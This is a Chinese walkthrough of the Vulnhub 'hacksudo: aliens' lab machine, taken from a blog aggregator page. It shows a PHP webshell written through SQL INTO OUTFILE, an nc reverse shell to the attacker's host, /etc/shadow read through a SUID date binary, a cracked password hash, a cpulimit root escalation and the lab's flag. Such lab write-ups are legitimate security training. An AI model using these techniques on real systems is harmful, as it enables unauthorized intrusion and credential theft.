当前位置: 首页 > article >正文

vulhub系列-84-hacksudo: aliens(超详细)

article 2026/4/24 7:49:39
免责声明本文记录的是 hacksudo: aliens 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/hacksudo/HacksudoAliens.zip一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.6 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:99:09:f8 PCS Systemtechnik GmbH 192.168.5.12 08:00:27:9e:8e:c4 PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 3 respondednmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 08:25 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00015s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00015s latency). MAC Address: 08:00:27:99:09:F8 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.12 Host is up (0.00012s latency). MAC Address: 08:00:27:9E:8E:C4 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.6 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 9.94 seconds目标IP192.168.5.122、探测目标IP开放端口nmap -sV -p- 192.168.5.12┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 08:25 -0400 Nmap scan report for 192.168.5.12 Host is up (0.000070s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 9000/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:9E:8E:C4 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ​ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds端口22、80、90003、目录探测dirsearch -u http://192.168.5.12┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.12 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.12/_26-03-25_08-26-38.txt Target: http://192.168.5.12/ [08:26:38] Starting: [08:26:39] 403 - 277B - /.ht_wsr.txt [08:26:39] 403 - 277B - /.htaccess.bak1 [08:26:39] 403 - 277B - /.htaccess.save [08:26:39] 403 - 277B - /.htaccess.sample [08:26:39] 403 - 277B - /.htaccess.orig [08:26:39] 403 - 277B - /.htaccess_extra [08:26:39] 403 - 277B - /.htaccess_orig [08:26:39] 403 - 277B - /.htaccess_sc [08:26:39] 403 - 277B - /.htaccessBAK [08:26:39] 403 - 277B - /.htaccessOLD2 [08:26:39] 403 - 277B - /.htaccessOLD [08:26:39] 403 - 277B - /.htm [08:26:39] 403 - 277B - /.html [08:26:39] 403 - 277B - /.htpasswds [08:26:39] 403 - 277B - /.httr-oauth [08:26:39] 403 - 277B - /.php [08:26:41] 403 - 277B - /.htpasswd_test [08:26:47] 301 - 313B - /backup - http://192.168.5.12/backup/ [08:26:47] 200 - 458B - /backup/ [08:26:52] 200 - 17KB - /favicon.ico [08:26:54] 301 - 313B - /images - http://192.168.5.12/images/ [08:26:54] 200 - 456B - /images/ [08:27:02] 200 - 16B - /README.md [08:27:04] 403 - 277B - /server-status/ [08:27:04] 403 - 277B - /server-status Task Completed二、漏洞利用1、信息搜集/backup 目录http://192.168.5.12/backup/#!/bin/bash # Specify which database is to be backed up db_name # Set the website which this database relates to websitelocalhost # Database credentials uservishal passwordhacksudo hostlocalhost # How many days would you like to keep files for? days30 ###################################################### ##### EDITING BELOW MAY CAUSE UNEXPECTED RESULTS ##### ###################################################### # Set the date date$(date %Y%m%d-%H%M) # Set the location of where backups will be stored backup_location/var/backups/mysql # Create the directory for the website if it doesnt already exist mkdir -p ${backup_location}/${website} # Append the database name with the date to the backup location backup_full_name${backup_location}/${website}/${db_name}-${date}.sql # Set default file permissions umask 177 # Dump database into SQL file mysqldump --lock-tables --user$user --password$password --host$host $db_name $backup_full_name # Set a value to be used to find all backups with the same name find_backup_name${backup_location}/${website}/${db_name}-*.sql # Delete files older than the number of days defined find $find_backup_name -mtime $days -type f -delete发现了数据库的用户名和密码**uservishal passwordhacksudo**9000端口http://192.168.5.12:9000/使用数据库的用户名和密码登录登录成功2、webshell使用sql写入一句话木马SELECT ?php system($_GET[sain]); ? INTO OUTFILE /var/www/html/shell.php写入成功3、getshell访问webshellhttp://192.168.5.12/shell.php验证成功利用 nc 反弹 shell并本地监听nc -e /bin/bash 192.168.5.6 1234反弹成功┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.5.6] from (UNKNOWN) [192.168.5.12] 51432 id uid33(www-data) gid33(www-data) groups33(www-data)三、权限提升1、切换bash下shellpython3 -c import pty; pty.spawn(/bin/bash)python3 -c import pty; pty.spawn(/bin/bash) www-datahacksudo:/var/www/html$2、查看权限和SUID文件find / -perm -us -type f 2/dev/nullwww-datahacksudo:/var/www/html$ find / -perm -us -type f 2/dev/null find / -perm -us -type f 2/dev/null /usr/bin/date /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/fusermount /usr/bin/gpasswd /usr/bin/mount /usr/bin/su /usr/bin/ntfs-3g /usr/bin/bwrap /usr/bin/sudo /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/pppd www-datahacksudo:/var/www/html$发现可以用 datedate 可以越权查看文件date -f /etc/shadowwww-datahacksudo:/var/www/html$ date -f /etc/shadow date -f /etc/shadow date: invalid date ‘root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::’ date: invalid date ‘daemon:*:18714:0:99999:7:::’ date: invalid date ‘bin:*:18714:0:99999:7:::’ date: invalid date ‘sys:*:18714:0:99999:7:::’ date: invalid date ‘sync:*:18714:0:99999:7:::’ date: invalid date ‘games:*:18714:0:99999:7:::’ date: invalid date ‘man:*:18714:0:99999:7:::’ date: invalid date ‘lp:*:18714:0:99999:7:::’ date: invalid date ‘mail:*:18714:0:99999:7:::’ date: invalid date ‘news:*:18714:0:99999:7:::’ date: invalid date ‘uucp:*:18714:0:99999:7:::’ date: invalid date ‘proxy:*:18714:0:99999:7:::’ date: invalid date ‘www-data:*:18714:0:99999:7:::’ date: invalid date ‘backup:*:18714:0:99999:7:::’ date: invalid date ‘list:*:18714:0:99999:7:::’ date: invalid date ‘irc:*:18714:0:99999:7:::’ date: invalid date ‘gnats:*:18714:0:99999:7:::’ date: invalid date ‘nobody:*:18714:0:99999:7:::’ date: invalid date ‘_apt:*:18714:0:99999:7:::’ date: invalid date ‘systemd-timesync:*:18714:0:99999:7:::’ date: invalid date ‘systemd-network:*:18714:0:99999:7:::’ date: invalid date ‘systemd-resolve:*:18714:0:99999:7:::’ date: invalid date ‘messagebus:*:18714:0:99999:7:::’ date: invalid date ‘tss:*:18714:0:99999:7:::’ date: invalid date ‘dnsmasq:*:18714:0:99999:7:::’ date: invalid date ‘usbmux:*:18714:0:99999:7:::’ date: invalid date ‘rtkit:*:18714:0:99999:7:::’ date: invalid date ‘pulse:*:18714:0:99999:7:::’ date: invalid date ‘speech-dispatcher:!:18714:0:99999:7:::’ date: invalid date ‘avahi:*:18714:0:99999:7:::’ date: invalid date ‘saned:*:18714:0:99999:7:::’ date: invalid date ‘colord:*:18714:0:99999:7:::’ date: invalid date ‘geoclue:*:18714:0:99999:7:::’ date: invalid date ‘hplip:*:18714:0:99999:7:::’ date: invalid date ‘Debian-gdm:*:18714:0:99999:7:::’ date: invalid date ‘hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::’ date: invalid date ‘systemd-coredump:!!:18714::::::’ date: invalid date ‘sshd:*:18714:0:99999:7:::’ date: invalid date ‘mysql:!:18720:0:99999:7:::’ www-datahacksudo:/var/www/html$得到hacksudo用户的密码哈希值$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um13、密码爆破john hash --wordlist/usr/share/wordlists/rockyou.txt┌──(root㉿kali)-[~] └─# john hash --wordlist/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status aliens (?) 1g 0:00:00:02 DONE (2026-03-25 08:37) 0.4878g/s 3746p/s 3746c/s 3746C/s pheonix..thesimpsons Use the --show option to display all of the cracked passwords reliably Session completed.hacksudo的密码一下就出来了aliens那就 ssh 登录ssh hacksudo192.168.5.12 密码**aliens**┌──(root㉿kali)-[~] └─# ssh hacksudo192.168.5.12 The authenticity of host 192.168.5.12 (192.168.5.12) cant be established. ED25519 key fingerprint is: SHA256:XUlS4R9GczG8s3rLmHyLIacottCV5nGnO/wvGzLMtXQ This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.5.12 (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to store now, decrypt later attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html hacksudo192.168.5.12s password: Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Apr 4 02:12:24 2021 from 192.168.43.217 hacksudohacksudo:~$4、查看权限和 SUID 文件hacksudohacksudo:~$ find / -perm -us -type f 2/dev/null /home/hacksudo/Downloads/cpulimit /usr/bin/date /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/fusermount /usr/bin/gpasswd /usr/bin/mount /usr/bin/su /usr/bin/ntfs-3g /usr/bin/bwrap /usr/bin/sudo /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/pppd hacksudohacksudo:~$有个二进制文件比较可疑。查看一下cd /home/hacksudo/Downloads/ ./cpulimit -hhacksudohacksudo:~$ cd /home/hacksudo/Downloads/ hacksudohacksudo:~/Downloads$ hacksudohacksudo:~/Downloads$ ./cpulimit -h CPUlimit version 2.4 Usage: ./cpulimit TARGET [OPTIONS...] [-- PROGRAM] TARGET must be exactly one of these: -p, --pidN pid of the process -e, --exeFILE name of the executable program file The -e option only works when cpulimit is run with admin rights. -P, --pathPATH absolute path name of the executable program file OPTIONS -b --background run in background -f --foreground launch target process in foreground and wait for it to exit -c --cpuN override the detection of CPUs on the machine. -l, --limitN percentage of cpu allowed from 1 up. Usually 1 - 100, but can be higher on multi-core CPUs (mandatory) -m, --monitor-forks Watch children/forks of the target process -q, --quiet run in quiet mode (only print errors). -k, --kill kill processes going over their limit instead of just throttling them. -r, --restore Restore processes after they have been killed. Works with the -k flag. -s, --signalSIG Send this signal to the watched process when cpulimit exits. Signal should be specificed as a number or SIGTERM, SIGCONT, SIGSTOP, etc. SIGCONT is the default. -v, --verbose show control statistics -z, --lazy exit if there is no suitable target process, or if it dies -- This is the final CPUlimit option. All following options are for another program we will launch. -h, --help display this help and exit hacksudohacksudo:~/Downloads$在 gtfobins 上找到了它的提权方式提权到 root./cpulimit -l 100 -f -- /bin/sh -phacksudohacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p Process 1481 detected # id uid1000(hacksudo) gid1000(hacksudo) euid0(root) egid0(root) groups0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo) # # whoami root #查看 flag# cd /root # # ls root.txt # # cat root.txt _ _ _ _ | | | | __ _ ___| | _____ _ _ __| | ___ | |_| |/ _ |/ __| |/ / __| | | |/ _ |/ _ \ | _ | (_| | (__| \__ \ |_| | (_| | (_) | |_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ _ _ _ ____ __ / \ | (_) ___ _ __ | ___| / /_ / _ \ | | |/ _ \ _ \|___ \| _ \ / ___ \| | | __/ | | |___) | (_) | /_/ \_\_|_|\___|_| |_|____/ \___/ ​ congratulations you rooted hacksudo alien56...!!! flag{d045e6f9feb79e94442213f9d008ac48} # ​本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。

相关文章:

vulhub系列-84-hacksudo: aliens(超详细)

免责声明:本文记录的是 hacksudo: aliens 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安…...

编程日记 2026/4/24 7:49:39

XUnity.AutoTranslator终极指南:5分钟让外语游戏变母语

XUnity.AutoTranslator终极指南:5分钟让外语游戏变母语 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator 还在为外语Unity游戏的语言障碍而烦恼吗?XUnity.AutoTranslator是一款革命性…...

编程日记 2026/4/24 7:49:38

如何用Red Panda Dev-C++ 7快速掌握C++编程:轻量级开发环境终极指南

如何用Red Panda Dev-C 7快速掌握C编程:轻量级开发环境终极指南 【免费下载链接】Dev-CPP A greatly improved Dev-Cpp 项目地址: https://gitcode.com/gh_mirrors/dev/Dev-CPP 还在为复杂的C开发环境配置而烦恼吗?Red Panda Dev-C 7为你提供了一…...

编程日记 2026/4/24 7:49:37

核心基础-消息队列-生产者/消费者模型

生产者/消费者模型 生产者/消费者模型是计算机科学中一种经典的并发设计模式,它通过引入一个共享缓冲区来解耦生产者和消费者,解决两者速度不匹配的问题。该模型在多线程编程、消息队列、操作系统调度等领域有着广泛的应用。作为运维工程师,理解这一模型对于排查系统瓶颈、…...

编程日记 2026/4/24 7:49:22

2025届最火的降重复率神器推荐榜单

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 要降低AIGC也就是人工智能生成内容的比例,其核心是要减少机器生成所具有的典型特…...

编程日记 2026/4/24 7:47:22

Phi-mini-MoE-instruct惊艳效果:中英混合提问+跨语言答案生成实录

Phi-mini-MoE-instruct惊艳效果:中英混合提问跨语言答案生成实录 1. 模型能力全景展示 Phi-mini-MoE-instruct作为一款轻量级混合专家(MoE)指令型小语言模型,在多个基准测试中展现出超越同级模型的卓越性能: 代码能…...

编程日记 2026/4/24 7:47:22

2025_NIPS_Convergence Theorems for Entropy-Regularized and Distributional Reinforcement Learning

文章核心总结与创新点 主要内容 该研究聚焦熵正则化强化学习(ERL)和分布强化学习(DRL)的收敛性问题,针对传统ERL在温度趋近于零时最优策略模糊、DRL缺乏收敛迭代方案的缺陷,提出温度解耦策略(temperature decoupling gambit),构建了可解释、保多样性的最优策略框架,…...

编程日记 2026/4/24 7:47:22

2025_NIPS_CALM: Culturally Self-Aware Language Models

文章核心总结与翻译 一、主要内容 本文提出CALM(Culturally Self-Aware Language Models)框架,旨在为语言模型赋予文化自我意识,解决现有模型将文化视为静态知识、缺乏动态适应性的问题。CALM通过四个核心模块实现文化感知:抽象认知空间分离任务语义与显式/隐式文化特征…...

编程日记 2026/4/24 7:47:22

WSL2+VSCode搭建ESP-IDF 开发环境

1.以管理员身份打开 PowerShell win r ,输入cmd ,同时按 ctrl shift enter,进入管理员系统管理下,输入 powershell,2.启用适用于 Linux 的 Windows 子系统,输入如下命令: dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsyste…...

编程日记 2026/4/24 7:47:19

告别命令行!在VSCode里一键调试你的Vue3 + Element Plus项目(附完整launch.json配置)

在VSCode中高效调试Vue3与Element Plus项目的完整指南 每次保存代码后都要手动刷新浏览器?终端窗口和编辑器来回切换导致注意力分散?作为长期使用Vue进行企业级应用开发的工程师,我发现VSCode内置的调试工具能彻底改变这种低效的工作模式。本…...

编程日记 2026/4/24 7:45:19

家庭收支链上记账小程序,每笔收支写入链式结构,不可删除,支持家庭成员共同查看,解决账目争议,隐瞒消费问题。

👉 「家庭收支链上记账小程序(Family Ledger Chain)」适用于:✅ 夫妻共同记账✅ 合租室友 AA 结算✅ 父母子女共管账户✅ 解决“钱花哪了”“谁没出钱”的信任问题一、实际应用场景描述(Scenario)你和家人共…...

编程日记 2026/4/24 7:45:11

嵌入式软件开发系列文章——1 ARM架构下Cortex-M 内核单片机开发环境搭建—1-3 STM32CubeMX

1-3 STM32CubeMX 文章目录1-3 STM32CubeMX1-3.1 STM32CubeMX 简介1-3.2 软件获取1-3.2.1 Java 获取1-3.2.2 STM32CubeMX 获取1-3.3 软件安装1-3.2.1 Java 安装1-3.2.2 STM32CubeMX 安装1-3.4 STM32固件包简介1-3.5 STM32固件包获取1-3.6 STM32固件包安装1-3.5 参考文献1-3.1 ST…...

编程日记 2026/4/24 7:45:05

个人电子合同自动签署程序,实现基于哈希的简易签约,记录签约时间,双方标识,生成不可篡改凭证,适用于私人借款,合租协议。防止事后抵赖。

结合区块链与创新思维课程中的「去中心信任、不可篡改、时间戳证明」思想,设计一个👉 「个人电子合同自动签署程序(Hash-Based Signing System)」适用于:✅ 私人借款✅ 合租协议✅ 兼职/合作约定✅ 防事后抵赖的小型契…...

编程日记 2026/4/24 7:45:00

手把手教你用uni-app搞定蓝牙小票打印(附芝珂/佳博/精臣CPCL指令集)

基于uni-app的蓝牙小票打印全流程实战指南 在移动互联网时代,小型商户和仓库管理对便携式打印的需求日益增长。想象一下这样的场景:当顾客在零售店完成购物后,店员可以直接通过手机或平板快速打印出清晰的小票;仓库管理员在盘点货…...

编程日记 2026/4/24 7:44:46

STM32 AES256加密串口IAP升级Bootloader程序及上位机软件全套资料获取:加...

stm32 AES256加密 串口IAP升级 bootloader程序 通过上位机将keil生成的BIN文件进行AES加密,得到新的加密文件,加密需要自己设置秘钥,加密升级包直接烧录不能运行。 通过串口升级上位机将加密包发送到单片机, 单片机接收到数据后&a…...

编程日记 2026/4/24 7:42:46

VSCode量子插件配置失效?2026 v1.8.3补丁修复了92%的Qiskit-OpenQASM桥接故障(附官方未公开诊断清单)

更多请点击: https://intelliparadigm.com 第一章:VSCode量子插件配置失效的典型现象与影响面分析 当 VSCode 中安装的量子计算相关插件(如 Q# Extension、Qiskit for VS Code 或 Microsoft Quantum Development Kit)突然无法识别…...

编程日记 2026/4/24 7:42:46

OpenClaw 自动化验收从零到一:环境部署、核心原理与首次运行排错全记录

二、 实战第一步:OpenClaw 运行环境与依赖部署详解 万事开头难,跑通环境是成功的一半。OpenClaw 的核心是一个 Python 包,但其运行依赖一个清晰的环境。下面我们一步步来,确保你的基础打得牢。 2.1 环境准备:Python 与虚拟环境 强烈建议使用 Python 3.8 及以上版本。为…...

编程日记 2026/4/24 7:42:46

065.模型安全初探:对抗样本攻击对YOLO模型的影响

一、从产线误检说起 上周产线上出了件怪事:一套部署了YOLOv5的视觉检测系统,连续三天在凌晨三点左右误将良品判为缺陷。现场工程师查遍了光照、机械振动、温湿度,甚至怀疑是电源干扰,最后发现有人工巡检员经过时,系统误检率就会飙升。我们调取日志分析,发现巡检员工服上…...

编程日记 2026/4/24 7:42:46

Open Interpreter股票API接入:金融数据写库实战步骤

Open Interpreter股票API接入:金融数据写库实战步骤 1. 项目概述与环境准备 今天我们来探索一个非常实用的技术场景:如何使用Open Interpreter接入股票API,并将获取的金融数据自动写入数据库。这个方案特别适合需要定期收集和分析股票数据的…...

编程日记 2026/4/24 7:42:45

YOLO系列算法改进 | C3k2改进篇 | 融合SFD显著特征判别模块,全局通道关系建模驱动复杂环境精准感知,适应遥感与边缘部署场景 | ICME 2026

0. 前言 本文介绍SFD显著特征判别模块(Salient Feature Discriminator),并将其集成到ultralytics最新发布的YOLO26目标检测算法中,构建C3k2_SFD创新模块。SFD是一种通过通道间关系建模和图结构推理来判别显著特征的注意力机制,旨在解决复杂背景下目标与背景难以区分、微小…...

编程日记 2026/4/24 7:40:45

【数据分析电商领域】电商类指标

电商核心指标 GMV 转化 流量 用户 履约 商品 营销 风控 流量:UV、PV、访问深度、跳出率转化:转化率、加购率、支付率、客单价(AOV)用户:新客占比、复购率、留存率、LTV交易:GMV、订单量、支付金额、…...

编程日记 2026/4/24 7:40:45

AI Agent是下一个风口?揭秘能自主完成任务的AI助手,ChatGPT之后最大的革命!

最近两年,“AI Agent"这个词突然刷屏了。朋友圈有人说它是"下一个风口”,科技媒体说它是"ChatGPT之后最大的革命",各种发布会上CEO们也都在扯这个词——但大多数人其实根本不知道它到底是什么东西。 我也一样&#xff0c…...

编程日记 2026/4/24 7:40:45

大语言模型自我进化:从依赖人类到自主迭代,未来AI如何实现持续成长?

随着大语言模型(LLMs)的发展,仅依靠人类监督来提升模型性能的成本高昂且存在局限。本文提出了“自我改进”的概念,即模型自主生成数据、评估输出并迭代优化自身能力。文章从系统级视角提出了一套整合现有技术的统一框架&#xff0…...

编程日记 2026/4/24 7:40:45

时间复杂度讲解

一、基础概念数据结构是计算机存储、组织数据的方式,指相互之间存在一种或多种特定关系的数据元素的集合。而算法是定义良好的计算过程,简单来说就是将输入转化为输出的一系列计算步骤。我们用复杂度来衡量算法的优劣。复杂度分为时间复杂度(…...

编程日记 2026/4/24 7:40:45

Oumuamua-7b-RP惊艳表现:在用户插入英语单词时自动切换混合语应答模式

Oumuamua-7b-RP惊艳表现:在用户插入英语单词时自动切换混合语应答模式 1. 项目概述 Oumuamua-7b-RP 是一款基于Mistral-7B架构的日语角色扮演专用大语言模型Web界面,专为沉浸式角色对话体验设计。这个模型最令人惊艳的功能是能够智能识别用户输入中的英…...

编程日记 2026/4/24 7:38:45

写代码时频繁打喷嚏?别信“有人想你”,这是身体系统的预警日志

写代码时频繁打喷嚏?别信“有人想你”,这是身体系统的预警日志 专栏链接:匠身颐和 作者:培风图南以星河揽胜 技以匠心,身以颐和。穷源溯流,昂霄耸壑;至道嘉猷,静水流深。 前言 作为…...

编程日记 2026/4/24 7:38:45

Oumuamua-7b-RP步骤详解:Web UI中调整Top-k=30提升角色专注度实操

Oumuamua-7b-RP步骤详解:Web UI中调整Top-k30提升角色专注度实操 1. 项目概述 Oumuamua-7b-RP 是一款专为日语角色扮演对话设计的Web界面大语言模型,基于Mistral-7B架构开发。这个工具特别适合想要体验沉浸式日语角色对话的用户,通过简单的…...

编程日记 2026/4/24 7:38:45

终极指南:3步掌握哔哩下载姬,轻松获取8K超清B站视频

终极指南:3步掌握哔哩下载姬,轻松获取8K超清B站视频 【免费下载链接】downkyi 哔哩下载姬downkyi,哔哩哔哩网站视频下载工具,支持批量下载,支持8K、HDR、杜比视界,提供工具箱(音视频提取、去水印…...

编程日记 2026/4/24 7:38:45

RISC-V微架构侧信道攻击检测技术解析

1. RISC-V微架构侧信道攻击检测技术解析 在开源指令集架构RISC-V快速普及的背景下,其微架构安全问题日益凸显。最近我在使用gem5仿真器研究RISC-V处理器时,发现了一种名为FlushFault的微架构侧信道攻击,这种攻击通过操纵指令缓存状态和异常处…...

编程日记 2026/4/24 7:38:45

给汽车电子工程师的AURIX安全手册:ISO 26262 ASIL D合规,从硬件锁步到软件库的实战指南

AURIX安全架构深度实战:从硬件锁步到软件库的ASIL D合规指南 对于汽车电子工程师而言,功能安全从来不是选择题,而是必答题。当你的项目需要满足ISO 26262 ASIL D这一汽车行业最高安全等级时,英飞凌AURIX™ TC2xx/TC3xx系列MCU提供…...

编程日记 2026/4/24 7:36:44